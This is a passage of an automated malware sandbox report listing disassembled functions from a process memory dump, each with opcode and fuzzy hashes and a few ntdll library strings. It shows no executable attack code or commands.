                                                                                                                        • Instruction ID: 80a7eb81b43b2f53c77aa4609a94c73e5e2369d8b89faad1e540cde7c79f9455
                                                                                                                        • Opcode Fuzzy Hash: d2402f26f8b9356c1529461534b7fdc60bd2b42587e7188ba01dcf7b2e654b82
                                                                                                                        • Instruction Fuzzy Hash: A0900262746441525645B1988404507404697E1341795C063A1414991C89269956D621
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92D30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 8d8b55a8acfe5b51057a2e88b0383819588e7c2caaef64dc90ba9f3dcfea1b99
                                                                                                                        • Instruction ID: 6af6c489016ce6c69881ca9a653cbec0f83c58f378faf97c5187eaf981541f16
                                                                                                                        • Opcode Fuzzy Hash: 8d8b55a8acfe5b51057a2e88b0383819588e7c2caaef64dc90ba9f3dcfea1b99
                                                                                                                        • Instruction Fuzzy Hash: 8990026270540003D240719894186064045D7E2301F55D062E0414595CDD1589565222
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92D10 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f5c50bdda68d248fdbcce94921d3f6482097fe8f133b51251db19e716a360d9
                                                                                                                        • Instruction ID: 8bb23f8de925de2389caf363c4e4adbfb89df07377e3334d8256756a42b3f527
                                                                                                                        • Opcode Fuzzy Hash: 6f5c50bdda68d248fdbcce94921d3f6482097fe8f133b51251db19e716a360d9
                                                                                                                        • Instruction Fuzzy Hash: 4090026A71740002D2807198940860A004587D2302F95D466A0015599CCD1589695321
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92D00 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f26ec19599ae63727ef5b1a545c90841f0813ba560a8ce3148be4d2963dea229
                                                                                                                        • Instruction ID: bda744a3d180dd4786a131e9e56289b17ebad8a74e5606e0aced2d38d10a3374
                                                                                                                        • Opcode Fuzzy Hash: f26ec19599ae63727ef5b1a545c90841f0813ba560a8ce3148be4d2963dea229
                                                                                                                        • Instruction Fuzzy Hash: 1C90026270944442D20075989408A06004587D1305F55D062A10645D6DCA358951A131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92EA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f9b79be8cbfb140b1335d26256a5464a19df13f46607d1dddd5eb6ca0a358030
                                                                                                                        • Instruction ID: 21ae517f828fd0ef9326124326b661a1f24b8329df36b2ea9225e15bead1a9be
                                                                                                                        • Opcode Fuzzy Hash: f9b79be8cbfb140b1335d26256a5464a19df13f46607d1dddd5eb6ca0a358030
                                                                                                                        • Instruction Fuzzy Hash: E09002B270540402D24071988404746004587D1301F55C062A5064595E8A598ED56665
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92E80 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: aaa44828a50890385a4d3029cae39e7ab10e9a13fb1d001317a68d6573073733
                                                                                                                        • Instruction ID: 8edce2e09ddfed94fea47e1cadf6caa39832f6fe44a0a181e99c48acf523f2a2
                                                                                                                        • Opcode Fuzzy Hash: aaa44828a50890385a4d3029cae39e7ab10e9a13fb1d001317a68d6573073733
                                                                                                                        • Instruction Fuzzy Hash: EB900262B0540502D20171988404616004A87D1341F95C073A1024596ECE258A92A131
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92EE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 852ea9059207d3571b6b4ce7e9fd02739aca5070a9505c42b79f331b7405a243
                                                                                                                        • Instruction ID: f8cb03cc8ecd3cd005a1a8ec602d7ea8b9f2fc9c612a724cc67390723245b927
                                                                                                                        • Opcode Fuzzy Hash: 852ea9059207d3571b6b4ce7e9fd02739aca5070a9505c42b79f331b7405a243
                                                                                                                        • Instruction Fuzzy Hash: 099002A270580403D24075988804607004587D1302F55C062A2064596E8E298D516135
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92E30 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 211ebb29602ba281012893b52b01bdbd7d4d526f32cc912b9480b5c8ab21ab6a
                                                                                                                        • Instruction ID: 700c5120e178c56596f7273a57dfcb3b602f9e5cd78dc47e0759ddce691c465c
                                                                                                                        • Opcode Fuzzy Hash: 211ebb29602ba281012893b52b01bdbd7d4d526f32cc912b9480b5c8ab21ab6a
                                                                                                                        • Instruction Fuzzy Hash: 6E90026270540402D202719884146060049C7D2345F95C063E1424596D8A258A53A132
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92FB0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: c07269fc1f58c756248cf94a4374f0a305d47260ed6891d05cf66462ef17345c
                                                                                                                        • Instruction ID: 54f97c4a6262cc8aaa4cc7d146d58a314febcda43cb1b21ac8b0ab191ebe9b8c
                                                                                                                        • Opcode Fuzzy Hash: c07269fc1f58c756248cf94a4374f0a305d47260ed6891d05cf66462ef17345c
                                                                                                                        • Instruction Fuzzy Hash: 71900262B0540042424071A8C8449064045ABE2311755C172A0998591D895989655665
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92FA0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: ce220559f5d46c37e355e3aa270cd1ede854b251b413ae09170c5c2ebff964e9
                                                                                                                        • Instruction ID: 8187b6a4e1ae21b0b5e0a571247c0729dbbc5b475ccdd9d22f80c08cdd1c66a9
                                                                                                                        • Opcode Fuzzy Hash: ce220559f5d46c37e355e3aa270cd1ede854b251b413ae09170c5c2ebff964e9
                                                                                                                        • Instruction Fuzzy Hash: B090027270580402D20071988808747004587D1302F55C062A5164596E8A65C9916531
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92F90 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2e926f6091ab0ab1bfe74311076f314f492f04866db6c58469bd232d4c22b1c1
                                                                                                                        • Instruction ID: 6510d58c5ffa3230d5a4298a2ac4843c178f4f627da6ea53340cd2b234ee6834
                                                                                                                        • Opcode Fuzzy Hash: 2e926f6091ab0ab1bfe74311076f314f492f04866db6c58469bd232d4c22b1c1
                                                                                                                        • Instruction Fuzzy Hash: 3290027270580402D2007198881470B004587D1302F55C062A1164596D8A2589516571
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92FE0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 5c050317b9faf28dd3cb3d9709d6b577026412088d7b013a09e2a78a0c268f88
                                                                                                                        • Instruction ID: 8c3a99b7b500a05e3caddca7560b1ba2982ad6a43e35c2b12b146371f6096835
                                                                                                                        • Opcode Fuzzy Hash: 5c050317b9faf28dd3cb3d9709d6b577026412088d7b013a09e2a78a0c268f88
                                                                                                                        • Instruction Fuzzy Hash: 8D900262715C0042D30075A88C14B07004587D1303F55C166A0154595CCD1589615521
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92F30 Relevance: .0, Instructions: 4COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a63b63e85652f9ba7e05c040d5da01b6edb315b8406aea5714efcee9a5f5d46c
                                                                                                                        • Instruction ID: c5c388f49da417efbd5688aee3078219033b5bdc995de61b6911c90b3e7947ae
                                                                                                                        • Opcode Fuzzy Hash: a63b63e85652f9ba7e05c040d5da01b6edb315b8406aea5714efcee9a5f5d46c
                                                                                                                        • Instruction Fuzzy Hash: 199002A274540442D20071988414B060045C7E2301F55C066E1064595D8A19CD526126
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92F60 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 94a75b68b28d01915492b81f95ff63f3593041e0c54882daba15b959a3ba569e
                                                                                                                        • Instruction ID: fac089c1b440b832c25fd2063ffab8c823841d293dac9df5b2bc46352019ae61
                                                                                                                        • Opcode Fuzzy Hash: 94a75b68b28d01915492b81f95ff63f3593041e0c54882daba15b959a3ba569e
                                                                                                                        • Instruction Fuzzy Hash: A39002A271540042D20471988404706008587E2301F55C063A2154595CC9298D615125
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B93090 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 0b5a12abb8271fea32b58323fd7bc5cd63e7e5be5814d1edc9d2fb44133e185b
                                                                                                                        • Instruction ID: 36e1c2c7bc301e180fd4ad1eb6f16e32172ec2a6f18145990d5e6c4e93987b36
                                                                                                                        • Opcode Fuzzy Hash: 0b5a12abb8271fea32b58323fd7bc5cd63e7e5be5814d1edc9d2fb44133e185b
                                                                                                                        • Instruction Fuzzy Hash: E590026274540802D2407198C4147070046C7D1701F55C062A0024595D8A168A6566B1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B93010 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f0f4694b7f521ab39fd2010316adbf1c2dc865cf15eec7efaacce5248b438716
                                                                                                                        • Instruction ID: 505e3234bf43d28454d9c926a6fa93a0f7ef7398c265fb86e0ad1fdb1ecf5539
                                                                                                                        • Opcode Fuzzy Hash: f0f4694b7f521ab39fd2010316adbf1c2dc865cf15eec7efaacce5248b438716
                                                                                                                        • Instruction Fuzzy Hash: 6690026270584442D24072988804B0F414587E2302F95C06AA4156595CCD1589555721
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B939B0 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 4a63544c35b66927e5c6092a62426fe654516e77a0d9d2af538c0e52d5a47733
                                                                                                                        • Instruction ID: 4baba50f29adeaa2d69bf5aa8fb850bb04d04986af88c1e1c44f7646a0e38f75
                                                                                                                        • Opcode Fuzzy Hash: 4a63544c35b66927e5c6092a62426fe654516e77a0d9d2af538c0e52d5a47733
                                                                                                                        • Instruction Fuzzy Hash: CB90026274945102D250719C84046164045A7E1301F55C072A08145D5D895589556221
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B93D10 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 37ad6def97b4dcad83306031e8912cfe9cef02743c9a008a089a4446b786f9cf
                                                                                                                        • Instruction ID: 15fa26cf7482c727f0965063253d95334c3735e0d4dd8f7049970350f4c69524
                                                                                                                        • Opcode Fuzzy Hash: 37ad6def97b4dcad83306031e8912cfe9cef02743c9a008a089a4446b786f9cf
                                                                                                                        • Instruction Fuzzy Hash: C890027270640142964072989804A4E414587E2302B95D466A0015595CCD1489615221
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B93D70 Relevance: .0, Instructions: 4COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 72aac4c59d887af3f8b9838ffac7e9457c16941c5db9be74727a9534bfd53756
                                                                                                                        • Instruction ID: 892593428f60d6fba149c29f668cc765a805d1f7c07dcd2bc87f221069a329eb
                                                                                                                        • Opcode Fuzzy Hash: 72aac4c59d887af3f8b9838ffac7e9457c16941c5db9be74727a9534bfd53756
                                                                                                                        • Instruction Fuzzy Hash: 4590027670540402D61071989804646008687D1301F55D462A0424599D8A5489A1A121
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92C00 Relevance: .0, Instructions: 2COMMONLIBRARYCODE
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction ID: ebffde3731bab24e2d878ee78a0a1ba1ac082dcc0ee61f4b71b95bcd71a0a6fb
                                                                                                                        • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                        • Instruction Fuzzy Hash:
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B92890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: 622dc321e93db10bf694a24b41b12f8fa2ce90fbe3483d9328452f8c08acddfa
                                                                                                                        • Instruction ID: 031c4e77a13c3dd93aa9ad11469aaff81a128b49d22d72c8b1d6c71fd5b552ee
                                                                                                                        • Opcode Fuzzy Hash: 622dc321e93db10bf694a24b41b12f8fa2ce90fbe3483d9328452f8c08acddfa
                                                                                                                        • Instruction Fuzzy Hash: CD5184B6E0411ABACF20DBA888D0A7EF7F8FB19304B54C1B9E4A5D7641D274DE5097A0
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C02410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                                                                                                        • API String ID: 48624451-2108815105
                                                                                                                        • Opcode ID: f61efb050fa52ab1f2b4f81731577aac6c7dcd8a80bce803f6dff6b7f62964bd
                                                                                                                        • Instruction ID: 09da5025fa69a655adcd67099dcde88e0c19e70b3aa42e8cfbaa67239416daa4
                                                                                                                        • Opcode Fuzzy Hash: f61efb050fa52ab1f2b4f81731577aac6c7dcd8a80bce803f6dff6b7f62964bd
                                                                                                                        • Instruction Fuzzy Hash: 5551D171A00645AACB30DF9CCC9497EB7F8EB48300B1484AAF4A6D76C1E674EF40DB60
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B87630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
                                                                                                                        • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 00BC4655
                                                                                                                        • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 00BC46FC
                                                                                                                        • CLIENT(ntdll): Processing section info %ws..., xrefs: 00BC4787
                                                                                                                        • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 00BC4725
                                                                                                                        • Execute=1, xrefs: 00BC4713
                                                                                                                        • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 00BC4742
                                                                                                                        • ExecuteOptions, xrefs: 00BC46A0
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                                                                                        • API String ID: 0-484625025
                                                                                                                        • Opcode ID: 55b3069ad29e155cc2e82bd85095162db04a7595321eba55f72df276044d0367
                                                                                                                        • Instruction ID: 6f85ff1d299054f949e070f5576ed28b58f178bc4b2efe5474970987bb3615b9
                                                                                                                        • Opcode Fuzzy Hash: 55b3069ad29e155cc2e82bd85095162db04a7595321eba55f72df276044d0367
                                                                                                                        • Instruction Fuzzy Hash: D05107356842196ADF10BBA8DC9AFAE77E8EF45308F2400E9E505A71A1EF70DE45CB50
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C26940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction ID: a6ccbf1f7be3be8ab6168d2b3e0dfe6e67791965b1b6dd3fdb322c09e74cdefa
                                                                                                                        • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                                                                                                        • Instruction Fuzzy Hash: FA024371608351AFC705DF28D890A6FBBE5EFC8700F108A2DF9998B665DB31E905CB52
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B9B5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: __aulldvrm
                                                                                                                        • String ID: +$-$0$0
                                                                                                                        • API String ID: 1302938615-699404926
                                                                                                                        • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction ID: 76781d5db43479a4fdf79c900cf8e3424a780ac5478dfd43b6813e12ed641013
                                                                                                                        • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                                                                                                        • Instruction Fuzzy Hash: 1B81A170E052499EDF248FA8EA91FFEBBE5EF85310F1842B9D861A7291C7349C40CB51
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00C020E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        APIs
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000004.00000002.1527020260.0000000000B20000.00000040.00001000.00020000.00000000.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_4_2_b20000_btpqr.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ___swprintf_l
                                                                                                                        • String ID: %%%u$[$]:%u
                                                                                                                        • API String ID: 48624451-2819853543
                                                                                                                        • Opcode ID: ffc0de179750bc0fa5b45e0595b58d01101297b6e14c7f8bdd23b765662a5d81
                                                                                                                        • Instruction ID: 98cde415c9078041d0cfcbdd7b5629a12ef6a645f666ce433d54a7f8d2025ead
                                                                                                                        • Opcode Fuzzy Hash: ffc0de179750bc0fa5b45e0595b58d01101297b6e14c7f8bdd23b765662a5d81
                                                                                                                        • Instruction Fuzzy Hash: 8A215E76A00119ABCB10EF79CC45AAEBBF8EF54744F040166E955E3241EB30DE01DBA1
                                                                                                                        Uniqueness

                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                        Function 00B7F5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                                                                                                        Download Yara Rule
                                                                                                                        Strings
